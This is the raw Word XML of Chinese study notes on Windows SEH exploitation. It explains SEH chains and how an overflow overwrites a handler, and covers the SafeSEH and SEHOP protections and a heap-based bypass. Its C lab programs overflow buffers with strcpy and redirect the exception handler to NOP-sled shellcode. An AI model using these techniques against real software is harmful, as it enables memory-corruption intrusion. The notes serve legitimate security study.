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SEHAttack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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一．SEH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S.E.H即异常处理结构（Structure Exception Handler）,它是Windows异常处理机制所用的重要数据结构，每个SEH包含两个DWORD指针</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4"/>
        <w:tblW w:w="4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8"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4758" w:type="dxa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DWORD:Next SEH(下一个SEH指针)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4758" w:type="dxa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DWORD:Exception Handler(异常处理函数)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(1)SEH结构体存放在系统栈中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(2)当线程初始化时，系统会自动向栈中安装一个SEH，作为线程默认的异常处理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(3)如果程序源代码使用了__try{} __except(){}或者__Assert宏等异常处理机制，编译器会向当前函数栈中安装一个SEH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(4)栈中存在多个SEH，通过链表从栈底(高地址)指向栈顶(低地址),当异常出现时，会找最近的SEH处理,当处理失败时，将顺着SEH链表依次尝试其他的异常处理函数，如果都不适合，将调用系统默认的处理函数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二．在栈溢出中使用SEH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rPr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char shellcode[]="\x90\x90\x90\x90"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 "\x90\x90\x90\x90"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 "\x90\x90\x90\x90";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DWORD MyException(void){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printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>error !!!exit the process...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>");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getchar();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ExitProcess(1);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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/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void test(char *input){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char buf[20];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int zero=0;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__asm int 3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__try{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strcpy(buf,input);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zero=4/zero;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__except (MyException()){}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main(){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test(shellcode);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53460" cy="4709795"/>
            <wp:effectExtent l="0" t="0" r="8890" b="14605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411095"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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SEH链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971550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="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strcpy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14140" cy="3590290"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1016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zero=4/zero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66540" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="10160" b="952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当shellcode溢出时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95090" cy="3609340"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1016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zero=4/zero;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80940" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="10160" b="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三．在堆溢出利用SEH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即利用DWORD SHOOT修改SEH handler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SafeSEH--------针对SEH保护校验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safeSEH处理机制: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(1)检查异常处理函数链是否位于当前程序的栈中，如果不在当前栈中，程序将终止异常处理函数的调用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(2)检查异常处理函数的指针是否指向当前的程序栈中，如果指向当前栈中，程序将终止异常处理函数的调用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(3)在前面两项检查都通过后，程序调用一个全新的函数RtLIsValidHandler()校验函数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（查看sefeSEH.xlsx）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从堆中绕过safeSEH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如果SEH中的异常函数指针指向堆区，即使安全校验发现了SEH已经不可信，仍能会调用其已被修改的异常处理函数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启用safeSEH（dumpbin /loadconfig a.exe[release版]）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42815" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="635" b="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未启用safeSEH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14165" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="635" b="0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char shellcode[]=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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x90\x90\x90\x90"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"\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs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int MyException(void){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printf("error !!!exit the process...");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getchar();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exit(1);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void test(char * input)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char str[20];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int zero=0;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strcpy(str,input);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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__try{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zero=1/zero;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__except(MyException()){}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void main()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char * buf=(char *)malloc(100);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__asm int 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strcpy(buf,shellcode);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test(shellcode);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="42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* buf=(char *)malloc(100);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strcpy(buf,shellcode);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542790" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="10160" b="952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12FE8C ---&gt; shellcode:417130</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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12FE88 ---&gt; buf:392A60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838065" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="635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char str[20];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strcpy(str,input);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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1770" cy="2459990"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1651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FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>12FE78 --&gt; SEHhandler:392A60(buf)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SEHOP(Structured Exception Handling 0verwrite Procection)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这是一种比safeSEH更为严厉的保护机制，SEFOP的核心任务就是检查SEH链的完整性，在程序转入异常处理前SEHOP会检验SEH链上最后一个异常处理函数是否为系统固定的终极异常处理函数，之后在进行safeSEH检验，通常伪造SEH链来欺骗SEHOP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608302">
    <w:nsid w:val="5952F2AE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5952F2AE"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="4"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1．"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1498621402">
    <w:nsid w:val="595325DA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="595325DA"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1498608302"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1498621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8D00"/>
    <w:rsid w:val="176DBE50"/>
    <w:rsid w:val="255F24EB"/>
    <w:rsid w:val="2F7E08AE"/>
    <w:rsid w:val="2FF7DB91"/>
    <w:rsid w:val="3E7F6424"/>
    <w:rsid w:val="3FFFD2C8"/>
    <w:rsid w:val="55ABA72C"/>
    <w:rsid w:val="5C875E2C"/>
    <w:rsid w:val="5FFFB3B4"/>
    <w:rsid w:val="6BEE3511"/>
    <w:rsid w:val="76B276D9"/>
    <w:rsid w:val="79FED489"/>
    <w:rsid w:val="7A6FE626"/>
    <w:rsid w:val="83F6865E"/>
    <w:rsid w:val="8B9FDBF4"/>
    <w:rsid w:val="9BDDF112"/>
    <w:rsid w:val="A97DE340"/>
    <w:rsid w:val="AF6F2EA1"/>
    <w:rsid w:val="B757015C"/>
    <w:rsid w:val="D3F5FB8A"/>
    <w:rsid w:val="DEBF8FD2"/>
    <w:rsid w:val="ED9BE454"/>
    <w:rsid w:val="EFEADD8F"/>
    <w:rsid w:val="F57E07A2"/>
    <w:rsid w:val="F79DB817"/>
    <w:rsid w:val="F9FD49B1"/>
    <w:rsid w:val="FBF9A817"/>
    <w:rsid w:val="FE6F900F"/>
    <w:rsid w:val="FFFF8D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2017-06-28T06:57:00Z</dcterms:created>
  <dc:creator>wu</dc:creator>
  <cp:lastModifiedBy>wu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-28T11:45:31Z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